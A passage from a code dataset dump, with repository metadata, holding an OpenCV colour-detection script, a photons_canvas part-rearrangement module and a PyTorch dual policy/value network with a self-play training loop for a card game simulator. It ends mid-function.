path = "sources/lambo2.png"
#Burada renklerimizi ayarlayabilmek için bir trackbar hazırlayacağız
cv2.namedWindow("Trackbars") #making our window that our trackbars gon' be in
cv2.resizeWindow("Trackbars",640,240) #resizing our trackbar window
#birinci değerleri rengimizi istediğimiz gibi saptadıktan sonraki değerlerimiz olarak vereceğiz
cv2.createTrackbar("Hue Min","Trackbars",0,179,empty) #making a trackbar in our window and giving it values
cv2.createTrackbar("Hue Max","Trackbars",19,179,empty)
cv2.createTrackbar("Sat Min","Trackbars",110,255,empty) #saturation
cv2.createTrackbar("Sat Max","Trackbars",240,255,empty)
cv2.createTrackbar("Val Min","Trackbars",153,255,empty) #value
cv2.createTrackbar("Val Max","Trackbars",255,255,empty)
#we need it to read the value live, hence the loop
while True:
img = cv2.imread(path)
imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
h_min = cv2.getTrackbarPos("Hue Min","Trackbars") #read the value
h_max = cv2.getTrackbarPos("Hue Max", "Trackbars")
s_min = cv2.getTrackbarPos("Sat Min", "Trackbars")
s_max = cv2.getTrackbarPos("Sat Max", "Trackbars")
v_min = cv2.getTrackbarPos("Val Min", "Trackbars")
v_max = cv2.getTrackbarPos("Val Max", "Trackbars")
print(h_min,h_max,s_min,s_max,v_min,v_max)
lower = np.array([h_min,s_min,v_min]) #our filter arrays
upper = np.array([h_max,s_max,v_max])
mask = cv2.inRange(imgHSV,lower,upper) #making our filtered img
#now we can detect the orange color
imgResult = cv2.bitwise_and(img,img,mask=mask) # this will turn our black and white mask to an rgb img
cv2.imshow("Original", img)
cv2.imshow("HSV", imgHSV)
cv2.imshow("Masked", mask)
cv2.imshow("Result", imgResult)
cv2.waitKey(1) | 41.23913 | 108 | 0.714286 | #--COLOR DETECTION--#
import cv2
import numpy as np
#our function for trackbars
def empty(x):
pass
path = "sources/lambo2.png"
#Burada renklerimizi ayarlayabilmek için bir trackbar hazırlayacağız
cv2.namedWindow("Trackbars") #making our window that our trackbars gon' be in
cv2.resizeWindow("Trackbars",640,240) #resizing our trackbar window
#birinci değerleri rengimizi istediğimiz gibi saptadıktan sonraki değerlerimiz olarak vereceğiz
cv2.createTrackbar("Hue Min","Trackbars",0,179,empty) #making a trackbar in our window and giving it values
cv2.createTrackbar("Hue Max","Trackbars",19,179,empty)
cv2.createTrackbar("Sat Min","Trackbars",110,255,empty) #saturation
cv2.createTrackbar("Sat Max","Trackbars",240,255,empty)
cv2.createTrackbar("Val Min","Trackbars",153,255,empty) #value
cv2.createTrackbar("Val Max","Trackbars",255,255,empty)
#we need it to read the value live, hence the loop
while True:
img = cv2.imread(path)
imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
h_min = cv2.getTrackbarPos("Hue Min","Trackbars") #read the value
h_max = cv2.getTrackbarPos("Hue Max", "Trackbars")
s_min = cv2.getTrackbarPos("Sat Min", "Trackbars")
s_max = cv2.getTrackbarPos("Sat Max", "Trackbars")
v_min = cv2.getTrackbarPos("Val Min", "Trackbars")
v_max = cv2.getTrackbarPos("Val Max", "Trackbars")
print(h_min,h_max,s_min,s_max,v_min,v_max)
lower = np.array([h_min,s_min,v_min]) #our filter arrays
upper = np.array([h_max,s_max,v_max])
mask = cv2.inRange(imgHSV,lower,upper) #making our filtered img
#now we can detect the orange color
imgResult = cv2.bitwise_and(img,img,mask=mask) # this will turn our black and white mask to an rgb img
cv2.imshow("Original", img)
cv2.imshow("HSV", imgHSV)
cv2.imshow("Masked", mask)
cv2.imshow("Result", imgResult)
cv2.waitKey(1) | 2 | 0 | 23 |
724a8012ca1002b7331d8c73f477e13ffdcfc4e3 | 947 | py | Python | modules/photons_canvas/points/rearrange.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 51 | 2020-07-03T08:34:48.000Z | 2022-03-16T10:56:08.000Z | modules/photons_canvas/points/rearrange.py | delfick/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 81 | 2020-07-03T08:13:59.000Z | 2022-03-31T23:02:54.000Z | modules/photons_canvas/points/rearrange.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 8 | 2020-07-24T23:48:20.000Z | 2021-05-24T17:20:16.000Z | from photons_canvas.points.canvas import Canvas
| 23.097561 | 85 | 0.599789 | from photons_canvas.points.canvas import Canvas
class Separate:
    """Lay parts out one after another along the x axis, in canvas order.

    Widths are in pixels; user coordinates are in units of 8 pixels.
    """

    def rearrange(self, canvas):
        offset = 0
        for part in canvas.parts:
            yield part.clone(user_x=offset)
            offset += part.width / 8
class Straight:
    """Arrange parts in one horizontal row at user_y == 0, ordered
    deterministically by original x position, device, then part number."""

    def rearrange(self, canvas):
        def sort_key(part):
            return (part.real_part.user_x, part.device, part.part_number)

        offset = 0
        for part in sorted(canvas.parts, key=sort_key):
            yield part.clone(user_x=offset, user_y=0)
            offset += part.width / 8
class VerticalAlignment:
    """Keep horizontal placement but align every part to user_y == 0."""

    def rearrange(self, canvas):
        return (part.clone(user_y=0) for part in canvas.parts)
def rearrange(canvas, rearranger, keep_colors=False):
    """Build a new Canvas with *canvas*'s parts repositioned by *rearranger*.

    When keep_colors is True, each part is added together with its current
    colors so the new canvas preserves what was displayed.
    """
    rearranged = rearranger.rearrange(canvas)
    if keep_colors:
        parts = [(part, part.colors) for part in rearranged]
    else:
        parts = list(rearranged)
    result = Canvas()
    result.add_parts(*parts)
    return result
| 734 | -9 | 170 |
8bf92f9554a026c81421946868bc7e095ee1d032 | 31,097 | py | Python | Embedd_Network_model.py | AutumnCrocus/shadow_sim | 79ad13ff9bd7131c82f269af32a3970f3e4bf2ca | [
"MIT"
] | 6 | 2020-11-08T18:41:23.000Z | 2022-03-29T07:11:37.000Z | Embedd_Network_model.py | AutumnCrocus/shadow_sim | 79ad13ff9bd7131c82f269af32a3970f3e4bf2ca | [
"MIT"
] | 5 | 2020-08-09T11:32:59.000Z | 2022-03-12T00:21:44.000Z | Embedd_Network_model.py | AutumnCrocus/shadow_sim | 79ad13ff9bd7131c82f269af32a3970f3e4bf2ca | [
"MIT"
] | 1 | 2021-01-31T05:57:10.000Z | 2021-01-31T05:57:10.000Z | # -*- coding: utf-8 -*-
import torch
import os
from torch.multiprocessing import Pool, Process, set_start_method,cpu_count, RLock,freeze_support, Value, Array, Manager,cpu_count
#os.environ["OMP_NUM_THREADS"] = "4" if torch.cuda.is_available() else "6"
os.environ["PYTHONWARNINGS"] = 'ignore:semaphore_tracker:UserWarning'
import numpy as np
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
# from preprocess import *
from preprocess import d2v_model, d2v_ini_weight
import sys
from collections import namedtuple
import copy
import random
from my_enum import *
import torch.optim as optim
#from pytorch_memlab import profile
import argparse
from torch.autograd import detect_anomaly
from Additional_module import *
# Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
# One self-play training sample: resulting state, chosen action, the state the
# action was taken from, the encoded action details, and the final game reward.
Dual_State_value = namedtuple('Value', ('state', 'action', 'before_state', 'detailed_action_code','reward'))
# Flat snapshot of everything observable in a game state (hand, board, stats, ...).
Detailed_State_data = namedtuple('Value', ('hand_ids', 'hand_card_costs', 'follower_card_ids',
                                           'amulet_card_ids', 'follower_stats', 'follower_abilities', 'able_to_evo',
                                           'life_data', 'pp_data','able_to_play','able_to_attack', 'able_to_creature_attack',
                                           'deck_data'))
"""
input = {'values', 'hand_ids','follower_card_ids',
'amulet_card_ids', 'follower_abilities', 'able_to_evo'}
"""
#@profile
# Human-readable names for the deck ids used below; negative ids are "basic"
# starter decks, 100 is a test deck.
deck_id_2_name = {0: "Sword_Aggro", 1: "Rune_Earth", 2: "Sword", 3: "Shadow", 4: "Dragon_PDK", 5: "Haven",
                  6: "Blood", 7: "Dragon", 8: "Forest", 9: "Rune", 10: "DS_Rune", -1: "Forest_Basic", -2: "Sword_Basic",
                  -3: "Rune_Basic",
                  -4: "Dragon_Basic", -5: "FOREST_Basic", -6: "Blood_Basic", -7: "Haven_Basic", -8: "Portal_Basic",
                  100: "TEST",
                  -9: "Spell-Rune", 11: "PtP-Forest", 12: "Mid-Shadow", 13: "Neutral-Blood"}
# Maps deck id -> [deck-list TSV filename, leader class name].
key_2_tsv_name = {0: ["Sword_Aggro.tsv", "SWORD"], 1: ["Rune_Earth.tsv", "RUNE"], 2: ["Sword.tsv", "SWORD"],
                  3: ["New-Shadow.tsv", "SHADOW"], 4: ["Dragon_PDK.tsv", "DRAGON"], 5: ["Test-Haven.tsv", "HAVEN"],
                  6: ["Blood.tsv", "BLOOD"], 7: ["Dragon.tsv", "DRAGON"], 8: ["Forest.tsv", "FOREST"],
                  9: ["SpellBoost-Rune.tsv", "RUNE"], 10: ["Dimension_Shift_Rune.tsv", "RUNE"],
                  11: ["PtP_Forest.tsv", "FOREST"], 12: ["Mid_Shadow.tsv", "SHADOW"],
                  13: ["Neutral_Blood.tsv", "BLOOD"],100: ["TEST.tsv", "SHADOW"],
                  -2: ["Sword_Basic.tsv", "SWORD"]}
# +
# -
if __name__ == "__main__":
    # Self-play + training driver: sample games with an ISMCTS policy guided
    # by the current network, then fit the network on the collected
    # (state, action, reward) samples, snapshotting the opponent each epoch.
    parser = argparse.ArgumentParser(description='デュアルニューラルネットワーク学習コード')
    parser.add_argument('--episode_num', help='試行回数')
    parser.add_argument('--iteration_num', help='イテレーション数')
    parser.add_argument('--epoch_num', help='エポック数')
    parser.add_argument('--batch_size', help='バッチサイズ')
    parser.add_argument('--mcts', help='サンプリングAIをMCTSにする(オリジナルの場合は[OM])')
    parser.add_argument('--deck', help='サンプリングに用いるデッキの選び方')
    parser.add_argument('--cuda', help='gpuを使用するかどうか')
    parser.add_argument('--multi_train', help="学習時も並列化するかどうか")
    parser.add_argument('--epoch_interval', help="モデルの保存間隔")
    parser.add_argument('--fixed_deck_id', help="使用デッキidの固定")
    parser.add_argument('--cpu_num', help="使用CPU数", default=2 if torch.cuda.is_available() else 3)
    parser.add_argument('--batch_num', help='サンプルに対するバッチの数')
    args = parser.parse_args()  # duplicate parse_args() call removed
    deck_flg = int(args.fixed_deck_id) if args.fixed_deck_id is not None else None

    net = New_Dual_Net(100)
    if torch.cuda.is_available() and args.cuda == "True":
        net = net.cuda()
        print("cuda is available.")
    cuda_flg = args.cuda == "True"

    # Import order matters: the emulator must come first because of circular
    # dependencies between the game modules.
    from emulator_test import *  # importの依存関係により必ず最初にimport
    from Field_setting import *
    from Player_setting import *
    from Policy import *
    from Game_setting import Game

    G = Game()
    episode_len = 100
    if args.episode_num is not None:
        episode_len = int(args.episode_num)
    batch_size = 100
    if args.batch_size is not None:
        batch_size = int(args.batch_size)
    iteration = 10
    if args.iteration_num is not None:
        iteration = int(args.iteration_num)
    epoch_num = 2
    if args.epoch_num is not None:
        epoch_num = int(args.epoch_num)
    mcts = False
    if args.mcts is not None:
        mcts = True

    import datetime
    t1 = datetime.datetime.now()
    print(t1)
    R = New_Dual_ReplayMemory(100000)
    net.zero_grad()
    prev_net = copy.deepcopy(net)
    import os
    optimizer = optim.Adam(net.parameters(), weight_decay=0.01)

    for epoch in range(epoch_num):
        print("epoch {}".format(epoch + 1))
        R = New_Dual_ReplayMemory(100000)  # fresh sample buffer each epoch
        # "Alice" plays with the current network, "Bob" with last epoch's snapshot.
        p1 = Player(9, True, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=net, cuda=cuda_flg))
        p1.name = "Alice"
        p2 = Player(9, False, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=prev_net, cuda=cuda_flg))
        p2.name = "Bob"
        win_num = 0
        for episode in tqdm(range(episode_len)):
            f = Field(5)
            deck_type1 = deck_flg
            deck_type2 = deck_flg
            if deck_flg is None:
                deck_type1 = random.choice(list(key_2_tsv_name.keys()))
                deck_type2 = random.choice(list(key_2_tsv_name.keys()))
            d1 = tsv_to_deck(key_2_tsv_name[deck_type1][0])
            d1.set_leader_class(key_2_tsv_name[deck_type1][1])
            d2 = tsv_to_deck(key_2_tsv_name[deck_type2][0])
            d2.set_leader_class(key_2_tsv_name[deck_type2][1])
            d1.shuffle()
            d2.shuffle()
            p1.deck = d1
            p2.deck = d2
            f.players = [p1, p2]
            p1.field = f
            p2.field = f
            # Alternate which seat the training samples are collected for.
            train_data, reward = G.start_for_dual(f, virtual_flg=True, target_player_num=episode % 2)
            # Reset per-game player state so the Player objects can be reused.
            f.players[0].life = 20
            f.players[0].hand.clear()
            f.players[0].deck = None
            f.players[0].lib_out_flg = False
            f.players[1].life = 20
            f.players[1].hand.clear()
            f.players[1].deck = None
            f.players[1].lib_out_flg = False
            for i in range(2):
                for data in train_data[i]:
                    R.push(data[0], data[1], data[2], data[3], reward[i])
            win_num += int(reward[episode % 2] > 0)
        print("sample_size:{}".format(len(R.memory)))
        print("win_rate:{:.2%}".format(win_num / episode_len))

        prev_net = copy.deepcopy(net)
        sum_of_loss = 0
        sum_of_MSE = 0
        sum_of_CEE = 0
        p, pai, z, states, loss = None, None, None, None, None
        current_net, prev_optimizer = None, None
        for i in tqdm(range(iteration)):
            print("\ni:{}\n".format(i))
            states, actions, rewards = R.sample(batch_size)
            states['target'] = {'actions': actions, 'rewards': rewards}
            p, v, loss = net(states, target=True)
            z = rewards
            pai = actions  # 45 abstract action categories
            if (i + 1) % 100 == 0:
                print("target:{} output:{}".format(z[0], v[0]))
                print("target:{} output:{}".format(pai[0], p[0]))
                print("loss:{}".format([loss[j].item() for j in range(3)]))
            # BUG FIX: the original tested `torch.isnan(loss)`, but `loss` is a
            # 3-part object (indexed as loss[0..2] everywhere else), so that
            # test cannot yield a scalar truth value. Test the overall loss
            # component instead, matching the post-loop check below.
            if torch.isnan(loss[0]):
                # Training diverged: roll back to the last healthy snapshot.
                # NOTE(review): if this fires on the very first iteration,
                # current_net/prev_optimizer are still None (pre-existing issue).
                net = current_net
                optimizer = torch.optim.Adam(net.parameters())
                optimizer.load_state_dict(prev_optimizer.state_dict())
            else:
                current_net = copy.deepcopy(net)
                prev_optimizer = copy.deepcopy(optimizer)
                optimizer.zero_grad()
                loss[0].backward()
                sum_of_loss += float(loss[0].item())
                sum_of_MSE += float(loss[1].item())
                sum_of_CEE += float(loss[2].item())
                optimizer.step()
        print("{}".format(epoch + 1))
        print("AVE | Over_All_Loss: {:.3f} | MSE: {:.3f} | CEE:{:.3f}"
              .format(sum_of_loss / iteration, sum_of_MSE / iteration, sum_of_CEE / iteration))
        if torch.isnan(loss[0]):
            # Dump layer-wise weight extrema to help locate the divergence.
            for key in list(net.state_dict().keys()):
                print(key, net.state_dict()[key].size())
                if len(net.state_dict()[key].size()) == 1:
                    print(torch.max(net.state_dict()[key], dim=0), "\n", torch.min(net.state_dict()[key], dim=0))
                else:
                    print(torch.max(net.state_dict()[key], 0), "\n", torch.min(net.state_dict()[key], 0))
                print("")
            assert False
        # Periodic checkpoint at every quarter of the training run.
        if epoch_num > 4 and (epoch + 1) % (epoch_num // 4) == 0 and epoch + 1 < epoch_num:
            PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
                                                                    t1.second, (epoch + 1) / epoch_num)
            if torch.cuda.is_available() and cuda_flg:
                PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour,
                                                                             t1.minute, t1.second,
                                                                             (epoch + 1) / epoch_num)
            torch.save(net.state_dict(), PATH)
            print("{} is saved.".format(PATH))

    print('Finished Training')
    PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
                                                         t1.second)
    if torch.cuda.is_available() and cuda_flg:
        PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
                                                                  t1.second)
    torch.save(net.state_dict(), PATH)
    print("{} is saved.".format(PATH))
    t2 = datetime.datetime.now()
    print(t2)
    print(t2 - t1)
| 47.045386 | 149 | 0.610123 | # -*- coding: utf-8 -*-
import torch
import os
from torch.multiprocessing import Pool, Process, set_start_method,cpu_count, RLock,freeze_support, Value, Array, Manager,cpu_count
#os.environ["OMP_NUM_THREADS"] = "4" if torch.cuda.is_available() else "6"
os.environ["PYTHONWARNINGS"] = 'ignore:semaphore_tracker:UserWarning'
import numpy as np
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
# from preprocess import *
from preprocess import d2v_model, d2v_ini_weight
import sys
from collections import namedtuple
import copy
import random
from my_enum import *
import torch.optim as optim
#from pytorch_memlab import profile
import argparse
from torch.autograd import detect_anomaly
from Additional_module import *
# Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
# One self-play training sample: resulting state, chosen action, the state the
# action was taken from, the encoded action details, and the final game reward.
Dual_State_value = namedtuple('Value', ('state', 'action', 'before_state', 'detailed_action_code','reward'))
# Flat snapshot of everything observable in a game state (hand, board, stats, ...).
Detailed_State_data = namedtuple('Value', ('hand_ids', 'hand_card_costs', 'follower_card_ids',
                                           'amulet_card_ids', 'follower_stats', 'follower_abilities', 'able_to_evo',
                                           'life_data', 'pp_data','able_to_play','able_to_attack', 'able_to_creature_attack',
                                           'deck_data'))
"""
input = {'values', 'hand_ids','follower_card_ids',
'amulet_card_ids', 'follower_abilities', 'able_to_evo'}
"""
class PositionalEncoding(nn.Module):
    """Add the standard sinusoidal position signal (sin on even feature
    indices, cos on odd ones) to a (seq_len, batch, d_model) tensor, then
    apply dropout."""

    def __init__(self, d_model, dropout=0.1, max_len=5000):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)

        positions = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
        frequencies = torch.exp(torch.arange(0, d_model, 2).float() * (-np.log(10000.0) / d_model))
        table = torch.zeros(max_len, d_model)
        table[:, 0::2] = torch.sin(positions * frequencies)
        table[:, 1::2] = torch.cos(positions * frequencies)
        # Stored as (max_len, 1, d_model) so it broadcasts over the batch dim.
        self.register_buffer('pe', table.unsqueeze(0).transpose(0, 1))

    def forward(self, x):
        return self.dropout(x + self.pe[:x.size(0), :])
class New_Dual_Net(nn.Module):
    """AlphaZero-style dual-headed network: a shared state encoder feeds a
    policy head (per-action values passed through a filtered softmax over the
    legal-action mask) and a value head (tanh-squashed scalar outcome estimate).

    NOTE(review): several attributes (self.rnn, self.relu, the commented-out
    transformer encoder) look like leftover experiments — they are built but
    not used in forward(); confirm before removing.
    """
    def __init__(self,n_mid,rand=False, hidden_num=6):
        """Build the encoder, residual trunk and both heads.

        :param n_mid: width of the hidden representation.
        :param rand: forwarded to Simple_State_Net; presumably selects random
            vs. doc2vec-initialised card embeddings — TODO confirm.
        :param hidden_num: hidden layer count forwarded to Simple_State_Net.
        """
        super(New_Dual_Net, self).__init__()
        self.state_net =Simple_State_Net(n_mid,rand=rand,hidden_n=hidden_num)
        #Dual_State_Net(n_mid,rand=rand)
        # Card-id embedding is shared with the state encoder.
        self.emb1 = self.state_net.emb1#nn.Embedding(3000,n_mid,padding_idx=0)# 1000 cards * 3 categories (including blank)
        layer_num = 2#3
        self.vec_size = self.state_net.vec_size
        # Width of the encoded "previous action" vector concatenated below.
        self.hiddden_size = 2 * self.vec_size + 5
        layer = [Dual_ResNet(n_mid+self.hiddden_size,n_mid+self.hiddden_size) for _ in range(layer_num)]
        self.layer = nn.ModuleList(layer)
        self.layer_len = len(self.layer)
        self.action_value_net = Action_Value_Net(self,mid_size=n_mid)
        self.loss_fn = Dual_Loss()
        self.filtered_softmax = filtered_softmax()
        self.n_mid = n_mid
        # self.mish = torch.sigmoid#Mish()
        #self.direct_layer = nn.Linear(n_mid, n_mid)
        # Residual stack in front of the scalar value head.
        self.preprocess_len = 5
        preprocess_layer = [Dual_ResNet(n_mid,n_mid) for _ in range(self.preprocess_len)]
        self.preprocess_layer = nn.ModuleList(preprocess_layer)
        self.final_layer = nn.Linear(n_mid,1)
        nn.init.kaiming_normal_(self.final_layer.weight)
        #self.conv = nn.Conv1d(in_channels=100,out_channels=1,kernel_size=1)
        self.relu = torch.tanh#torch.sigmoid()#nn.ReLU()
        self.prelu = torch.tanh#torch.sigmoid()#nn.PReLU(init=0.01)
        self.integrate_layer = nn.Linear(n_mid+self.hiddden_size,n_mid)
        nn.init.kaiming_normal_(self.integrate_layer.weight)
        self.rnn = nn.LSTM(input_size=n_mid,hidden_size=n_mid,batch_first=True,num_layers=3)
        #nn.init.kaiming_normal_(self.rnn.weight)
        #encoder_layers = nn.TransformerEncoderLayer(n_mid, 4 ,dropout=0.01)
        #self.transformer_encoder = nn.TransformerEncoder(encoder_layers, 1)
        # Template dict used only to capture the expected key layout of a
        # batched state; the key tuples derived below drive serialisation.
        ans = {'values': {'life_datas': None,
                          'class_datas': None,
                          'deck_type_datas': None,
                          'hand_card_costs': None,
                          'follower_stats': None,
                          'pp_datas': None,
                          'able_to_play': None,
                          'able_to_attack': None,
                          'able_to_creature_attack': None,
                          },
               'hand_ids': None,
               'follower_card_ids': None,
               'amulet_card_ids': None,
               'follower_abilities': None,
               'able_to_evo': None,
               'deck_datas': None,
               'detailed_action_codes': {'action_categories': None,
                                         'play_card_ids': None,
                                         'field_card_ids': None,
                                         'able_to_choice': None,
                                         'action_choice_len':None},
               'before_states':{'values': {'life_datas': None,
                                           'class_datas': None,
                                           'deck_type_datas': None,
                                           'hand_card_costs': None,
                                           'follower_stats': None,
                                           'pp_datas': None,
                                           'able_to_play': None,
                                           'able_to_attack': None,
                                           'able_to_creature_attack': None,
                                           },
                                'hand_ids': None,
                                'follower_card_ids': None,
                                'amulet_card_ids': None,
                                'follower_abilities': None,
                                'able_to_evo': None,
                                'deck_datas': None}
               }
        self.states_keys = tuple(ans.keys())
        self.normal_states_keys = tuple(set(self.states_keys) - {'values', 'detailed_action_codes', 'before_states'})
        self.value_keys = tuple(ans['values'].keys())
        self.action_code_keys = tuple(ans['detailed_action_codes'].keys())
        self.cuda_flg = False
        value_layer = [nn.Linear(n_mid,n_mid)for _ in range(3)]
        for i in range(len(value_layer)):
            nn.init.kaiming_normal_(value_layer[i].weight)
        self.value_layer = nn.ModuleList(value_layer)
    #@profile
    def forward(self, states,target=False):
        """Run the policy and value heads.

        :param states: batched dict of encoded game states (key layout as in
            the `ans` template above), including 'detailed_action_codes' and,
            when target=True, a 'target' entry with 'actions'/'rewards'.
        :param target: when True also compute and return the training loss.
        :return: (policy, value) or (policy, value, loss-tuple).
        """
        values = states['values']
        detailed_action_codes = states['detailed_action_codes']
        # action_categories = detailed_action_codes['action_categories']
        # play_card_ids = detailed_action_codes['play_card_ids']
        # field_card_ids = detailed_action_codes['field_card_ids']
        able_to_choice = detailed_action_codes['able_to_choice']
        action_choice_len = detailed_action_codes['action_choice_len']
        current_states = self.state_net(states)
        before_states = states["before_states"]
        #print("size:",before_states.size())
        # Encode the previous action: category one-hot + embeddings of the
        # acting/acted cards + side embedding.
        split_states = before_states#torch.split(before_states,[1,1,1,1],dim=1)
        try:
            embed_action_categories = self.action_value_net.action_catgory_eye[split_states[0].long()].view(-1,4)
            # print(before_states)
        except KeyError as err:
            print(before_states)
            print(err)
            sys.exit()
        #.to(stats.device)#self.emb1(action_categories)(-1,45,4)
        #embed_acting_card_ids = split_states[1]#self.action_value_net.emb2(split_states[1])
        embed_acting_card_ids = self.emb1(split_states[1])
        embed_acting_card_ids = self.action_value_net.prelu_3(embed_acting_card_ids)
        #embed_acted_card_ids = split_states[2]#self.action_value_net.emb2(split_states[2])#(-1,45,n_mid,?)
        embed_acted_card_ids = self.emb1(split_states[2])
        #embed_acted_card_sides = split_states[3].view(-1,1)#self.action_value_net.side_emb(split_states[3]) # (-1,45,?,n_mid)
        #print(split_states)
        embed_acted_card_sides = self.action_value_net.side_emb(split_states[3]).view(-1,1)
        input_tensors = [embed_action_categories,embed_acting_card_ids,
                         embed_acted_card_ids,embed_acted_card_sides]
        #for cell in input_tensors:
        #    print(cell.size())
        before_states = torch.cat(input_tensors,dim=1).view(-1,2*self.vec_size+5)
        #before_states = self.state_net(states["before_states"])
        current_states = current_states
        # Trunk: current-state encoding concatenated with previous-action encoding.
        x3 = torch.cat([current_states,before_states],dim=1)#current_states
        for i in range(self.layer_len):
            x3 = self.layer[i](x3)
        # for i in range(self.layer_len):
        #     x = self.layer[i](x)
        x=self.prelu(self.integrate_layer(x3))#+x3
        # Policy head: per-action values masked to the legal actions.
        tmp = self.action_value_net(x,detailed_action_codes,values,target=target)
        h_p2 = tmp
        out_p = self.filtered_softmax(h_p2, able_to_choice)
        # Value head: residual stack + tanh into [-1, 1].
        v_x = x
        for i in range(self.preprocess_len):
            v_x = self.preprocess_layer[i](v_x)
        out_v = torch.tanh(self.final_layer(v_x))#+before_x)
        if target:
            z = states['target']['rewards']
            pai = states['target']['actions']
            return out_p, out_v, self.loss_fn(out_p, out_v, z, pai,action_choice_len)
        else:
            return out_p, out_v
    def cuda(self):
        """Move the model (including the non-Module tensors held by the
        sub-networks) to GPU and remember the placement in cuda_flg."""
        self.state_net.cuda_all()
        self.action_value_net.cuda_all()
        print("model is formed to cuda")
        self.cuda_flg = True
        return super(New_Dual_Net, self).cuda()
    def cpu(self):
        """Move the model (including sub-network tensors) back to CPU."""
        self.state_net.cpu()
        self.action_value_net.cpu()
        print("model is formed to cpu")
        self.cuda_flg = False
        return super(New_Dual_Net, self).cpu()
class Dual_State_Net(nn.Module):
    """Encode a full game state (board followers, amulets, hands, decks, life,
    classes, deck types) into a single ``n_mid``-dimensional feature vector.

    Card ids are embedded with weights initialised from a doc2vec model
    (``d2v_ini_weight``) unless ``rand`` is True, in which case the embedding
    is Kaiming-initialised.
    """

    def __init__(self, n_mid, rand=False):
        super(Dual_State_Net, self).__init__()
        # Per-entity feature width; the concatenated state holds 94 such slots.
        self.short_mid = n_mid//10
        # follower stats (6) + 15 ability flags + 10 card features + 3 binary flags.
        self.value_layer = nn.Linear(6+15+10+1+1+1,self.short_mid)
        nn.init.kaiming_normal_(self.value_layer.weight)
        self.life_layer = nn.Linear(5, self.short_mid)
        nn.init.kaiming_normal_(self.life_layer.weight)
        # NOTE(review): the Linear(20, 10) layers below assume the doc2vec
        # embedding width is 20 — verify against preprocess.d2v_model.
        self.hand_value_layer = nn.Linear(20, 10)
        nn.init.kaiming_normal_(self.hand_value_layer.weight)
        self.hand_integrate_layer = nn.Linear(10, self.short_mid)
        nn.init.kaiming_normal_(self.hand_integrate_layer.weight)
        self.deck_value_layer = nn.Linear(20, 10)
        nn.init.kaiming_normal_(self.deck_value_layer.weight)
        self.deck_integrate_layer = nn.Linear(10, self.short_mid)
        nn.init.kaiming_normal_(self.deck_integrate_layer.weight)
        self.amulet_value_layer = nn.Linear(10, self.short_mid)
        nn.init.kaiming_normal_(self.amulet_value_layer.weight)
        self.field_value_layer = nn.Linear(20, 10)
        nn.init.kaiming_normal_(self.field_value_layer.weight)
        # Card-id embedding: id 0 is padding; doc2vec init unless rand=True.
        if rand:
            self.emb1 = nn.Embedding(2797, len(d2v_model.docvecs[0]), padding_idx=0)
            nn.init.kaiming_normal_(self.emb1.weight)
        else:
            self.emb1 = nn.Embedding(2797, len(d2v_model.docvecs[0]), padding_idx=0)
            self.emb1.weight = nn.Parameter(d2v_ini_weight)
        self.concat_layer = nn.Linear(self.short_mid, self.short_mid)
        nn.init.kaiming_normal_(self.concat_layer.weight)
        # One-hot lookup tables with an all-zero row 0 acting as "no value".
        self.class_eye = torch.cat([torch.Tensor([[0] * 8]), torch.eye(8)], dim=0)
        self.ability_eye = torch.cat([torch.Tensor([[0] * 15]), torch.eye(15)], dim=0)
        self.deck_type_eye = torch.cat([torch.Tensor([[0] * 4]), torch.eye(4)], dim=0)
        self.pos_encoder = PositionalEncoding(n_mid, dropout=0.1)
        self.prelu_layer = Mish()
        # Funnel from the flattened 94 * short_mid state down to n_mid.
        hidden_layer_num = 10
        origin = 94 * self.short_mid
        node_shrink_range = (origin - n_mid) // hidden_layer_num
        self.modify_layer_num = hidden_layer_num
        node_size_list = [origin - i * node_shrink_range for i in range(hidden_layer_num)] + [n_mid]
        modify_layer = [nn.Linear(node_size_list[i], node_size_list[i+1]) for i in range(hidden_layer_num)]
        self.modify_layer = nn.ModuleList(modify_layer)
        self.n_mid = n_mid

    def cuda_all(self):
        """Move the model and the plain (non-parameter) lookup tensors to GPU."""
        self.class_eye = self.class_eye.cuda()
        self.ability_eye = self.ability_eye.cuda()
        self.deck_type_eye = self.deck_type_eye.cuda()
        return super(Dual_State_Net, self).cuda()

    def cpu(self):
        """Move the model and the plain lookup tensors back to CPU."""
        self.class_eye = self.class_eye.cpu()
        self.ability_eye = self.ability_eye.cpu()
        self.deck_type_eye = self.deck_type_eye.cpu()
        return super(Dual_State_Net, self).cpu()

    def init_weights(self):
        """Re-initialise the card embedding uniformly in [-0.1, 0.1]."""
        initrange = 0.1
        self.emb1.weight.data.uniform_(-initrange, initrange)

    def forward(self, states):
        """Map a batched ``states`` dict to a (batch, n_mid) state encoding."""
        values = states['values']
        hand_ids = states['hand_ids']
        follower_card_ids = states['follower_card_ids']
        amulet_card_ids = states['amulet_card_ids']
        follower_abilities = states['follower_abilities']
        life_datas = values['life_datas']
        class_datas = values['class_datas']
        deck_type_datas = values['deck_type_datas']
        stats = values['follower_stats']
        deck_datas = states["deck_datas"]
        able_to_attack = values["able_to_attack"].view(-1, 10, 1)
        able_to_creature_attack = values["able_to_creature_attack"].view(-1, 10, 1)
        able_to_evo = states["able_to_evo"].view(-1, 10, 1)

        # One-hot leader classes / deck types, broadcast across the feature dim.
